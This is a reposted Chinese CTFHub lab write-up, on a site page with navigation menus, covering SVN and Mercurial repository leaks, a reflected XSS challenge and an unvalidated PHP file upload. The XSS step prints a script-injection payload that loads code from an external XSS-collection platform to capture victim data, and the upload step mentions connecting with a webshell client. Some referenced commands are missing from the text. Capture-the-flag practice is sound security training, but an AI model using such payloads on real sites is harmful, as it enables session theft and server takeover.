| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 开发工具 -> ctfhub-svn泄漏,HG泄漏,XSS反射性,文件上传--无验证 -> 正文阅读 |
|
[开发工具]ctfhub-svn泄漏,HG泄漏,XSS反射性,文件上传--无验证 |
目录 CTFHUB-SVN泄漏SVN(subversion)是程序员常用的源代码版本管理软件。一旦出现SVN泄漏黑客可获取网站源代码,一方面是掠夺了网站的技术知识资产,另一方面,黑客还可通过源代码分析其它安全漏洞,从而对网站服务器及用户数据造成持续威胁 --------------------------------------------------------------------------------------------- 首先先下载:dvcs-ripper(在kali中)
进行相关配置和组件
进入工具目录/dvcs-ripper,执行下面命令 ?HG泄露hit:当开发人员使用 Mercurial 进行版本控制,对站点自动部署。如果配置不当,可能会将.hg 文件夹直接部署到线上环境。这就引起了 hg 泄露漏洞。 ? ?XSS反射型跨站脚本攻击XSS(Cross Site Scripting): ? 具体可参考https://www.cnblogs.com/csnd/p/11807592.html 而反射型xss则不是这样,每次触发只能手动输入和点击才能触发。 我认为xss产生的原因主要是对html标签审查不严格造成的。 -------------------------- 题目说有xss所以去XSS平台搞一个承接数据的网址。https://xssaq.com/xss.php?do=project&act=view&id=11589 ? 复制</tExtArEa>'"><sCRiPt sRC=https://xssaq.com/YG2V></sCrIpT> 返回平台打开 ? ?文件上传 --无验证在记事本中写入
取名为a.txt 保存之后又改名为a.php 上传 用蚁剑 ? ? ? ? ? ? |
|
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/15 10:32:50- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |